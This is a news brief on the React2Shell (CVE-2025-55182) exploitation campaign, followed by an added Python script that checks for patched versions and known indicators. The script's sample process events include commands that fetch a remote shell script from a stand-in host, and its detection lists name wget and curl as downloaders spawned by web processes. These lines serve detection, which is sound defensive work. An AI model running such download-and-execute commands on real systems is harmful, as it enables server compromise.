Particle.news

Google Links More State Groups to React2Shell as Wallet-Draining Attacks Spread

A maximum-severity React Server Components bug allows unauthenticated code execution, driving large-scale compromises despite available patches.

Overview

  • Google’s Threat Intelligence Group said at least five additional China-linked espionage teams are exploiting CVE-2025-55182, with Iran-nexus and financially motivated actors also active.
  • Shadowserver reports more than 116,000 internet-facing IPs vulnerable to React2Shell, and GreyNoise observed over 670 unique hosts attempting exploitation in the past 24 hours.
  • Incident responders have documented deployments of backdoors, tunneling tools, and XMRig miners, as well as theft of AWS configuration files and other credentials on compromised cloud servers.
  • Security Alliance warned that compromised crypto sites are serving wallet-draining scripts and urged operators to review front-end assets for unfamiliar or obfuscated JavaScript.
  • Fixes are available in react-server-dom packages 19.0.1, 19.1.2, and 19.2.1 and in Next.js updates; hosting-platform WAF rules are offered as a temporary mitigation, and defenders are advised to monitor for wget or cURL spawned by web processes and for hidden directories such as $HOME/.systemd-utils.
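The following is an added example, not code from the original report or from the React or Next.js projects, that turns the last bullet into three defender-side checks: it compares installed react-server-dom package versions against the fixed releases named above (19.0.1, 19.1.2, 19.2.1), flags process-spawn records in which a web-server process launches wget or cURL, and reports the hidden directory named as an indicator. The package names (react-server-dom-webpack and friends), the web-process names, and the process-event log format are assumptions; the sample inputs are constructed for illustration.

```python
"""Defender-side checks for the React2Shell (CVE-2025-55182) indicators
described above. Sample inputs are constructed, not real telemetry."""

import re
from typing import Dict, List, Optional, Tuple

# Fixed versions per release line, as stated in the overview.
FIXED_BY_MINOR: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (19, 0): (19, 0, 1),
    (19, 1): (19, 1, 2),
    (19, 2): (19, 2, 1),
}

# Assumption: the affected packages are the react-server-dom-* family.
RSC_PACKAGE_RE = re.compile(r"^react-server-dom-")

# Assumption: typical process names for a Next.js / RSC server.
WEB_PROCESS_NAMES = {"node", "next-server", "next"}
DOWNLOADERS = {"wget", "curl"}

# Hidden directory named as an indicator in the overview.
IOC_HIDDEN_DIRS = {".systemd-utils"}

# Constructed process-event format: parent=<path> child=<path> argv="<cmd>"
EVENT_RE = re.compile(r'parent=(?P<parent>\S+)\s+child=(?P<child>\S+)\s+argv="(?P<argv>[^"]*)"')


def parse_version(v: str) -> Tuple[int, int, int]:
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def check_packages(installed: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Return (package, version, status) for each react-server-dom package.

    status is 'patched', 'vulnerable', or 'unknown-line' for a release line
    the overview does not list (consult the advisory for those)."""
    findings = []
    for name, ver in sorted(installed.items()):
        if not RSC_PACKAGE_RE.match(name):
            continue
        major, minor, patch = parse_version(ver)
        fixed = FIXED_BY_MINOR.get((major, minor))
        if fixed is None:
            status = "unknown-line"
        elif (major, minor, patch) >= fixed:
            status = "patched"
        else:
            status = "vulnerable"
        findings.append((name, ver, status))
    return findings


def parse_event(line: str) -> Optional[Dict[str, str]]:
    m = EVENT_RE.search(line)
    return m.groupdict() if m else None


def flag_downloader_spawns(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (parent, child, argv) for web processes that spawn wget/curl."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        parent = ev["parent"].rsplit("/", 1)[-1]
        child = ev["child"].rsplit("/", 1)[-1]
        if parent in WEB_PROCESS_NAMES and child in DOWNLOADERS:
            hits.append((parent, child, ev["argv"]))
    return hits


def suspicious_hidden_dirs(paths: List[str]) -> List[str]:
    """Return paths whose final component matches a named hidden-directory IoC."""
    return [p for p in paths if p.rstrip("/").rsplit("/", 1)[-1] in IOC_HIDDEN_DIRS]


# Constructed sample data.
SAMPLE_PACKAGES = {
    "react-server-dom-webpack": "19.1.1",
    "react-server-dom-parcel": "19.2.1",
    "react-server-dom-turbopack": "19.0.0",
    "react-dom": "19.1.1",
}
SAMPLE_EVENTS = [
    'parent=/usr/bin/node child=/usr/bin/wget argv="wget http://example.invalid/file"',
    'parent=/usr/bin/bash child=/usr/bin/curl argv="curl -s https://registry.npmjs.org/"',
    'parent=/usr/bin/node child=/usr/bin/node argv="node worker.js"',
    'parent=/usr/bin/next-server child=/usr/bin/curl argv="curl http://example.invalid/i.sh"',
]
SAMPLE_DIRS = ["/home/app/.systemd-utils", "/home/app/.cache", "/home/app/src"]

if __name__ == "__main__":
    for f in check_packages(SAMPLE_PACKAGES):
        print("package:", *f)
    for h in flag_downloader_spawns(SAMPLE_EVENTS):
        print("spawn:", *h)
    for d in suspicious_hidden_dirs(SAMPLE_DIRS):
        print("hidden dir:", d)
```

Feed `check_packages` the dependency map from a lockfile or `npm ls --json`, and `flag_downloader_spawns` a stream converted from whatever process-execution source the host has (auditd execve records, eBPF exec events, EDR telemetry); only the regex needs to change for the real format.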